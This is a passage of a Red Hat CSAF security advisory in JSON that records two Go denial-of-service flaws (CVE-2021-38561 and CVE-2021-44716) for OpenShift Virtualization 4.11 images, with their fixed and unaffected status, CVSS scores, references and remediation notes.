lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-38561" }, { "category": "external", "summary": "RHBZ#2100495", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2100495" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-38561", "url": "https://www.cve.org/CVERecord?id=CVE-2021-38561" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561" }, { "category": "external", "summary": "https://pkg.go.dev/vuln/GO-2021-0113", "url": "https://pkg.go.dev/vuln/GO-2021-0113" } ], "release_date": "2021-08-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: out-of-bounds read in golang.org/x/text/language leads to DoS" }, { "cve": "CVE-2021-44716", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-09T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030801" } ], "notes": [ { "category": "description", "text": "There\u0027s an uncontrolled resource consumption flaw in golang\u0027s net/http library in the canonicalHeader() function. An attacker who submits specially crafted requests to applications linked with net/http\u0027s http2 functionality could cause excessive resource consumption that could lead to a denial of service or otherwise impact to system performance and resources.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: net/http: limit growth of header canonicalization cache", "title": "Vulnerability summary" }, { "category": "other", "text": "For OpenShift Container Platform, OpenShift Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44716" }, { "category": "external", "summary": "RHBZ#2030801", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030801" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44716", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44716" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", "url": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k" } ], "release_date": "2021-12-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" }, { "category": "workaround", "details": "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 